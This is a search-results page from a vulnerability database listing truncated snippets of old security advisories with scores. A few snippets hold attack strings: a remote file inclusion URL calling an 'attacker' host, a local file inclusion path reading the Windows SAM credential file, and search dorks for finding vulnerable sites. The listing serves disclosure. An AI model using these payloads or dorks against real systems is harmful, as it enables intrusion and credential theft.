Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2014/12/01 12:0 a.m.135 views

[ MDVSA-2014:228 ] phpmyadmin

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:228 http://www.mandriva.com/en/support/security/ Package : phpmyadmin Date : November 26, 2014 Affected: Business Server 1.0 Problem Description: Multiple vulnerabilities has been discovered and corrected in...

6.5CVSS6.6AI score0.02725EPSS
Exploits3
securityvulns
securityvulns
added 2013/09/09 12:0 a.m.135 views

[SECURITY] [DSA 2740-1] python-django security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2740-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso August 23, 2013 http://www.debian.org/security/faq -...

1.5AI score
Exploits0
securityvulns
securityvulns
added 2013/04/08 12:0 a.m.135 views

SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance

SEC Consult Vulnerability Lab Security Advisory 20130403-0 ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: = 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number:...

9.3CVSS1AI score0.7099EPSS
Exploits12
securityvulns
securityvulns
added 2012/07/09 12:0 a.m.135 views

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env5Bincludeprefix5D=http://attacker/path/to/file.txt???...

1AI score
Exploits0
securityvulns
securityvulns
added 2010/03/11 12:0 a.m.135 views

[XSS] i found a xss on "page" parameter in "eccredit.php" in Dvbbs < 8.3.0

Home Page : http://www.dvbbs.net/ Dvbbs is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2008/06/19 12:0 a.m.135 views

CA ARCserve Backup Discovery Service Denial of Service Vulnerability

Title: CA ARCserve Backup Discovery Service Denial of Service Vulnerability CA Advisory Date: 2008-06-17 Reported By: Luigi Auriemma Impact: A remote attacker can cause a denial of service. Summary: CA ARCserve Backup contains a vulnerability in the Discovery service casdscsvc that can allow a...

5CVSS6.3AI score0.03634EPSS
Exploits1
securityvulns
securityvulns
added 2008/04/15 12:0 a.m.135 views

S21SEC-043-en:Cezanne SW Blind SQL Injection

S21Sec Advisory - Title: Cezanne SW login required Blind SQL Injection ID: S21SEC-043-en Severity: High History: 02.Jan.2008 Vulnerability discovered Authors: Juan de la Fuente Costa [email protected] Fco Javier Puerta Rubio [email protected] URL: http://www.s21sec.com/avisos/s21sec-43-en.txt...

Exploits0
securityvulns
securityvulns
added 2007/05/02 12:0 a.m.135 views

Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability

Sendcard sendcard.php Sendcard Local File Inclusion Vulnerability Discovered: ettee Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org "powered by Sendcard" Bug: "// Get the template details if!isset$form || $form == '' $form = "form"; if!isset$des || $des == '' $des ...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2007/02/21 12:0 a.m.135 views

[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final

Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description ...PHP-Nuke 8.0 Final version. This version includes a new anti-flood...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2007/02/05 12:0 a.m.135 views

flashChat 4.7.8 Cross Site Scripting Vulnerability

/ Flashchat 4.7.8 / Date of written Advisory: February 04, 2007 Product: Flash Chat = 4.7.8 Vendor: http://tufat.com/ Description: flashChat is a highly customizable PHP/MySQL based chat room script that is easily integrated into a website and mimics IRC in it's command structure Exploits /...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2006/11/22 12:0 a.m.135 views

Etomite CMS 0.6.1.2 Vulnerabilities + ContenNow 1.39 Vulnerabilities + Exploits

Etomite CMS 0.6.1.2 Multiple Vulnerabilities Severity : Medium risk Vendor : www.etomite.org Author : Alfredo Pesoli 'revenge' Secunia Advisory : SA22885 Security Focus BID : 21135 -------------------------------------------------- Description Etomite is a PHP Content Management System, more info...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2006/11/03 12:0 a.m.135 views

[SA22676] Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability

TITLE: Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA22676 VERIFY ADVISORY: http://secunia.com/advisories/22676/ CRITICAL: Highly critical IMPACT: Privilege escalation, DoS, System access WHERE: From remote OPERATING SYSTEM: Sun Solaris 10...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2005/02/14 12:0 a.m.135 views

Infostring crash and shutdown in the Quake 3 engine

Luigi Auriemma Application: Quake 3 engine http://www.idsoftware.com Games: - Call of Duty = 1.5 - Call of Duty: United Offensive = 1.51 - Heavy Metal: F.A.K.K.2 = 1.02 - Quake III Arena = 1.32 - Return to Castle Wolfenstein = 1.41 - Soldier of Fortune II: Double Helix = 1.03 - Star Trek Voyager:...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2003/06/21 12:0 a.m.135 views

phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures

phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures -------------------- Product: phpMyAdmin Vendor: phpMyAdmin Development Team Versions: VULNERABLE - 2.5.2 CVS in Development - 2.5.x - 2.4.x - 2.3.x - 2.2.x - 2.1.x - 2.0.x - 1.x.x NO...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2002/10/04 12:0 a.m.135 views

SSL protection bypass in Ximian Evolution

Insufficient certificate check on restored connection...

3.9AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2001/06/22 12:0 a.m.135 views

A-FTP Anonymous FTP Server Remote DoS attack Vulnerability

A-FTP Anonymous FTP Server Remote DoS attack Vulnerability Cartel Advisory Code: CART-0102 Vendor Affected: A-FTP Server - Eirik Helgeland [email protected] / [email protected] What It Is from the author: A free Unix Compatible Anonymous FTP server, running hidden from the user. Can be starte...

8AI score
Exploits0
securityvulns
securityvulns
added 2000/07/21 12:0 a.m.135 views

Security Update: DoS on gpm

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Caldera Systems, Inc. Security Advisory Subject: DoS on gpm Advisory number: CSSA-2000-024.0 Issue date: 2000 July, 6 Cross reference: 1. Problem Description There are security problems within gpm General Purpose Mouse support daemon which allow remov...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2015/10/05 12:0 a.m.134 views

[SYSS-2015-005] Kaspersky Total Security - Authentication Bypass

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-005 Product: Kaspersky Total Security KTS Vendor: Kaspersky Lab ZAO Affected Versions: 15.0.1.415 Tested Versions: 15.0.1.415 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level:...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2015/10/05 12:0 a.m.134 views

APPLE-SA-2015-09-21-1 watchOS 2

APPLE-SA-2015-09-21-1 watchOS 2 watchOS 2 is now available and addresses the following: Apple Pay Available for: Apple Watch Sport, Apple Watch, and Apple Watch Edition Impact: Some cards may allow a terminal to retrieve limited recent transaction information when making a payment Description: Th...

10CVSS0.6AI score0.2447EPSS
Exploits6
securityvulns
securityvulns
added 2015/07/27 12:0 a.m.134 views

libuser / userhelper security vulnerabilities

Unsafe files handling, insufficient characters filtering...

7.2CVSS2.7AI score0.06853EPSS
Exploits10References1
securityvulns
securityvulns
added 2014/06/17 12:0 a.m.134 views

[SE-2014-01] Security vulnerabilities in Oracle Database Java VM

Hello All, Security Explorations discovered multiple security issues in the implementation of a Java VM embedded in Oracle Database software 1. Discovered security issues violate many "Secure Coding Guidelines for the Java Programming Language" 2. Most of them demonstrate a well known problem...

Exploits0
securityvulns
securityvulns
added 2014/03/02 12:0 a.m.134 views

[slackware-security] subversion (SSA:2014-058-01)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security subversion SSA:2014-058-01 New subversion packages are available for Slackware 14.0, 14.1, and -current to fix denial-of-service issues. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...

4.3CVSS8.4AI score0.11052EPSS
Exploits0
securityvulns
securityvulns
added 2013/10/13 12:0 a.m.134 views

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities Exploit Author: absane Blog: http://blog.noobroot.com Discovery date: September 29th 2013 Vendor notified: September 29th 2013 Vendor fixed: October 2 2013 Vendor Homepage: http://cart66.com Software Link:...

6.8CVSS0.3AI score0.04084EPSS
Exploits7
securityvulns
securityvulns
added 2013/06/17 12:0 a.m.134 views

APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002 OS X Mountain Lion v10.8.4 and Security Update 2013-002 is now available and addresses the following: CFNetwork Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: An...

10CVSS0.2AI score0.98582EPSS
Exploits31
securityvulns
securityvulns
added 2012/09/24 12:0 a.m.134 views

APPLE-SA-2012-09-19-1 iOS 6

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-09-19-1 iOS 6 iOS 6 is now available and addresses the following: CFNetwork Available for: iPhone 3GS and later, iPod touch 4th generation and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to the...

10CVSS0.4AI score0.73164EPSS
Exploits22
securityvulns
securityvulns
added 2012/07/23 12:0 a.m.134 views

DomsHttpd 1.0 <= Remote Denial Of Service

DomsHttpd 1.0 = Remote Denial Of Service Discovered by: Jean Pascal Pereira [email protected] About DomsHttpd: "A very simple HTTP protocol program base on asynchronous socket model." Vendor URI: http://domshttpd.codeplex.com/ The remote attacker has the possibility to crash the application by...

1AI score
Exploits0
securityvulns
securityvulns
added 2011/08/27 12:0 a.m.134 views

Warah Agencia (productos.php?categoria_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Warah Agencia productos.php?categoriaid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.warah.com.ar/ Persian Gulf 4 Ever! Dork : "DESIGN BY WARAH AGENCIA CREATIVA"...

3.3AI score
Exploits0
securityvulns
securityvulns
added 2011/05/05 12:0 a.m.134 views

[RT-SA-2011-004] Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface

Advisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface The ZyXEL ZyWALL USG appliances perform parts of the authorization for their management web interface on the client side using JavaScript. By setting the JavaScript variable "isAdmin" to "true", a user with limited acce...

1AI score
Exploits0
securityvulns
securityvulns
added 2011/04/05 12:0 a.m.134 views

HTB22914: Local File Inclusion in UseBB

Vulnerability ID: HTB22914 Reference: http://www.htbridge.ch/advisory/localfileinclusioninusebb.html Product: UseBB Vendor: UseBB http://www.usebb.net/ Vulnerable Version: 1.0.11 Vendor Notification: 22 March 2011 Vulnerability Type: Local File Inclusion Risk level: Medium Credit: High-Tech Bridg...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2011/02/15 12:0 a.m.134 views

R7-0038: Check Point Endpoint Security Server Information Disclosure

R7-0038: Check Point Endpoint Security Server Information Disclosure February 7, 2011 -- Vulnerability Details: The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2010/12/24 12:0 a.m.134 views

MyBB 1.6 <= SQL Injection Vulnerability

================================= MyBB 1.6 = SQL Injection Vulnerability ================================= 1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's...

Exploits0
securityvulns
securityvulns
added 2010/09/20 12:0 a.m.134 views

n.runs-SA-2010.001 - Alcatel-Lucent - unauthenticated administrative access to CTI CCA Server

n.runs AG http://www.nruns.com/ securityatnruns.com n.runs-SA-2010.001 20-September-2010 Vendor: Alcatel Affected Products: Versions before 9.0.8.4 of the CCAgent option of OmniTouch Contact Center Standard Edition Vulnerability: unauthenticated administrative access to CTI CCA Server Risk: High...

7.6CVSS0.2AI score0.01075EPSS
Exploits0
securityvulns
securityvulns
added 2010/06/25 12:0 a.m.134 views

Mozilla Foundation Security Advisory 2010-30

Mozilla Foundation Security Advisory 2010-30 Title: Integer Overflow in XSLT Node Sorting Impact: Critical Announced: June 22, 2010 Reporter: Martin Barbella Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 Thunderbird 3.0.5 SeaMonkey 2.0.5 Description Security...

9.3CVSS1.3AI score0.11418EPSS
Exploits5
securityvulns
securityvulns
added 2010/05/28 12:0 a.m.134 views

PR10-02: Various XSS and information disclosure flaws within 3Com* iMC (Intelligent Management Center)

PR10-02: Various XSS and information disclosure flaws within 3Com iMC Intelligent Management Center On the 12th April 2010 Hewlett Packard completed its acquisition of 3Com Vulnerability found: 29th January 2010 Vendor informed: 1st February 2010 Vulnerability fixed: 13th May 2010 Severity:...

7AI score
Exploits0
securityvulns
securityvulns
added 2010/02/22 12:0 a.m.134 views

[SECURITY] [DSA-2002-1] New polipo packages fix denial of service

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-2002-1 [email protected] http://www.debian.org/security/ Stefan Fritsch February 19, 2010 http://www.debian.org/security/faq -...

10CVSS0.2AI score0.10066EPSS
Exploits1
securityvulns
securityvulns
added 2009/06/05 12:0 a.m.134 views

[SECURITY] CVE-2009-0580 UPDATED Apache Tomcat User enumeration vulnerability with FORM authentication

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Updated to clarify affected versions as they vary for each affected Realm. CVE-2009-0580: Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: MemoryRealm: Tomcat 4.1.0 to 4.1.39 Tomcat...

4.3CVSS4.9AI score0.9444EPSS
Exploits4
securityvulns
securityvulns
added 2009/01/09 12:0 a.m.134 views

FreeBSD Security Advisory FreeBSD-SA-09:01.lukemftpd

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-09:01.lukemftpd Security Advisory The FreeBSD Project Topic: Cross-site request forgery in lukemftpd8 Category: core Module: lukemftpd Announced: 2009-01-07...

7.5CVSS6.2AI score0.04045EPSS
Exploits1
securityvulns
securityvulns
added 2008/11/01 12:0 a.m.134 views

PHP-Nuke Module Current_Issue (summary&id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PHP-Nuke Module CurrentIssue summary&id AuTh0r : EhsanHp200 H0ME : www.only-4dl.tk Email : [email protected] Dork : "inurl:modules.php?name=CurrentIssue" Exploite:...

3.6AI score
Exploits0
securityvulns
securityvulns
added 2008/03/26 12:0 a.m.134 views

Mozilla Foundation Security Advisory 2008-13

Mozilla Foundation Security Advisory 2008-13 Title: Multiple XSS vulnerabilities from character encoding Impact: Moderate Announced: March 25, 2008 Reporter: Alexey Proskuryakov, Yosuke Hasegawa, Simon Montagu Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 2.0.0.12 Thunderbird 2.0.0....

4.3CVSS1.8AI score0.0162EPSS
Exploits1
securityvulns
securityvulns
added 2007/12/05 12:0 a.m.134 views

Sql Injection in wordpress 2.3.1

Author : Beenu Arora Mail : [email protected] Application : WordPress 2.3.1 Homepage: http://wordpress.org/ SQL Injection Vulnerable URL : http://localhost/pathtowordpress/?feed=rss2&p= Parameter : P POC =...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2007/07/23 12:0 a.m.134 views

Webspell 4.x Local File Inclusion

muH - $Title: Webspell 4.x Local File Inclusion Win $Damage Factor: Medium - High $Requires: Win Box & Php Supporting 00 $Discovered by muH $Usage: http://server.com/index.php?site=c:windowsrepairsam00...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2006/12/26 12:0 a.m.134 views

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

----------------------------------------------- PhpbbXtra v2.0 phpbbrootpath Remote File Include Vulnerability ----------------------------------------------- Author: xoron ----------------------------------------------- Vuln Code: include$phpbbrootpath . 'includes/bbcode.'.$phpEx;...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2006/10/13 12:0 a.m.134 views

zenphoto Multiple Path Disclosure and Cross Site Scripting Vulnerabilities

Vendor: zenphoto Vulnerable: zenphoto 1.0.2 beta and below The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta. Path Disclosure --------------- http://www.example.com/photos/zen/i.php?a=EXISTINGALBUMNAME&i=EXISTINGIMAGENAME&s=thumb00 which returns: Warning:...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2005/01/30 12:0 a.m.134 views

Microsoft Windows XP SP2 non-executable memory (DEP) protection bypass

By using small memory regisouns it's possible to place executable code into non-executable memory regions...

3.1AI score
Exploits0References1
securityvulns
securityvulns
added 2003/02/18 12:0 a.m.134 views

D-Forum (PHP)

Informations : °°°°°°°°°°°°°° Website : http://www.adalis.fr/adalis.html Versions : 1.00 - 1.11 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° /includes/header.php3 : --------------------------- ?php if $myheader!="" include $myheader; else ? ... --------------------------...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2000/12/22 12:0 a.m.134 views

Sample SecurID Token Emulator with Token Secret Import

Sample SecurID Token Emulator with Token Secret Import We have performed some cryptoanalysis and let's just say we do have grounds to believe that this algorithm is easily breakable. Once again, security of the cipher should be based entirely on the secrecy of the key, not the algorithm. Least...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2015/07/13 12:0 a.m.133 views

[USN-2658-1] PHP vulnerabilities

========================================================================== Ubuntu Security Notice USN-2658-1 July 06, 2015 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubunt...

10CVSS1.2AI score0.50129EPSS
Exploits19
securityvulns
securityvulns
added 2015/07/05 12:0 a.m.133 views

CollabNet Subversion Edge downloadHook local file inclusion

Vuln Title: Local file inclusion in CollabNet Subversion Edge Management Frontend via logfile "filename" parameter of the "downloadHook" action Date: 28.06.2015 Author: otr Software Link: https://www.open.collab.net/downloads/svnedge Vendor: CollabNet Version: 4.0.11 Tested on: Fedora Linux Type:...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2015/07/05 12:0 a.m.133 views

CollabNet Subversion Edge weak password policy

Vuln Title: The CollabNet Subversion Edge Management Frontend does not implement a strong password policy Date: 28.06.2015 Author: otr Software Link: https://www.open.collab.net/downloads/svnedge Vendor: CollabNet Version: 4.0.11 Tested on: Fedora Linux Type: Lack of defensive measures Risk: Medi...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2015/05/13 12:0 a.m.133 views

Adobe Flash Player multiple security vulnerabilities

Buffer overflows, memory corruptions, integer overflows, race conditions, restriction bypass...

10CVSS3.5AI score0.87303EPSS
Exploits10Affected Software1
Total number of security vulnerabilities5000